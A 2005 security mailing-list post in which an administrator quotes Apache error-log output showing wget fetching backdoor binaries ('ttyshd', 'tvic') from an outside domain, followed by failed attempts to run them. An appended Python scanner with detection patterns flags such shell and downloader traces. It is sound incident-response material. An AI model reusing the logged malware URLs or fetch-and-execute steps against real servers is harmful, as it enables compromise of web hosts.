backdoor named tvic / Kayten / ttyshd download in apache logfile
From: Henning (Henning.Lieder_at_gmail.com)
Date: 04/23/05
- Next message: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Previous message: Security Alert: "SSRT5940 rev.0 - HP-UX Mozilla remote, unauthorized user may execute privileged code"
- Next in thread: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 22 Apr 2005 15:25:47 -0700
Hi,
I found interesting lines in my apache2 error.log. They are not in the
log format.
It looks like a wget output. There was a file downloaded. I found this
file and it seems to be a backdoor.
In the ELF binary named tvic: 'Kayten Start backdoor for you'.
What is this? And how can my Apache download this?
I found no normal access/error entries at that timestamp 16:30 to 16:32
with active perl/php access.
The tvic file is still on that server (ilovekida.com <- this is not
mine).
Thanks
Henning
Log quote
Snip
[Thu Apr 21 15:50:32 2005] [error] [client **********] File does not
exist: ******
--16:31:28-- http://www.ilovekida.com/ttyshd
=> `ttyshd'
Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
68.142.234.38, ...
Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,179 [application/octet-stream]
ttyshd: Permission denied
Cannot write to `ttyshd' (Permission denied).
--16:32:11-- http://www.ilovekida.com/v1c11/tvic
=> `tvic'
Resolving www.ilovekida.com... 68.142.234.38, 68.142.234.36,
68.142.234.37, ...
Connecting to www.ilovekida.com[68.142.234.38]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,856 [application/octet-stream]
tvic: Permission denied
Cannot write to `tvic' (Permission denied).
sh: line 1: ./ttyshd: Permission denied
chmod: changing permissions of `ttyshd': Operation not permitted
sh: line 1: ./ttyshd: Permission denied
sh: line 1: ttyshd: command not found
--16:35:01-- http://www.ilovekida.com/v1c11/tvic
=> `tvic'
Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
68.142.234.38, ...
Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,856 [application/octet-stream]
0K .......... ....... 100%
87.46 KB/s
16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
[Thu Apr 21 16:50:29 2005] [error] [client *****] Name "main::path"
used only once: possible typo at ********
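The wget, sh and chmod lines above are not Apache log entries at all: they are the stderr of a shell that the web server process spawned (a CGI/PHP script running a command), which Apache inherits into error.log. A simple defender's check is therefore to flag any error.log line that does not start with the Apache entry format and looks like tool output, and to tie it to the nearest real entry for a timeline. This is an added example, not code from the original post; the sample log below is constructed after the quoted snippet, with a placeholder host instead of the original domain.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache 2.0 error_log entry: "[Thu Apr 21 15:50:32 2005] [error] [client x.x.x.x] msg"
APACHE_ERR = re.compile(r"^\[(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4})\] \[(?P<level>\w+)\]")

# Typical stderr of a shell-spawned downloader; the named group (if any) is the detail we keep.
SUSPICIOUS = [
    ("wget_fetch",  re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>\S+)")),
    ("wget_saved",  re.compile(r"- `(?P<file>[^']+)' saved \[\d+/\d+\]")),
    ("shell_error", re.compile(r"^sh: line \d+: (?P<cmd>\S+):")),
    ("chmod_error", re.compile(r"^chmod: ")),
]

@dataclass
class Finding:
    kind: str
    line_no: int
    detail: str
    last_apache_ts: Optional[str]   # timestamp of the last proper entry seen before this line

def scan_error_log(lines: List[str]) -> List[Finding]:
    """Return non-Apache lines that look like output of a spawned shell/downloader."""
    findings, last_ts = [], None
    for n, line in enumerate(lines, 1):
        m = APACHE_ERR.match(line)
        if m:
            last_ts = m.group("ts")
            continue
        for kind, pat in SUSPICIOUS:
            hit = pat.search(line)
            if hit:
                detail = next((v for v in hit.groupdict().values() if v), line.strip())
                findings.append(Finding(kind, n, detail, last_ts))
                break
    return findings

def fetched_urls(findings: List[Finding]) -> List[str]:
    """URLs the server process tried to download (what to block and hunt for)."""
    return [f.detail for f in findings if f.kind == "wget_fetch"]

# Constructed sample modeled on the quoted snippet (placeholder host, test-net address).
SAMPLE_LOG = """\
[Thu Apr 21 15:50:32 2005] [error] [client 10.0.0.5] File does not exist: /var/www/foo
--16:31:28--  http://malware-host.example/ttyshd
           => `ttyshd'
Connecting to malware-host.example[192.0.2.10]:80... connected.
Cannot write to `ttyshd' (Permission denied).
sh: line 1: ./ttyshd: Permission denied
chmod: changing permissions of `ttyshd': Operation not permitted
--16:35:01--  http://malware-host.example/v1c11/tvic
16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
[Thu Apr 21 16:50:29 2005] [error] [client 10.0.0.5] Name "main::path" used only once
""".splitlines()

if __name__ == "__main__":
    for f in scan_error_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} {f.detail} (after entry at {f.last_apache_ts})")
```

Run it over the real error.log and correlate the flagged block with access.log requests to the Perl/PHP scripts active in that window; the "Permission denied" lines also show the spawned shell ran as the unprivileged web user, which is what limited the damage here.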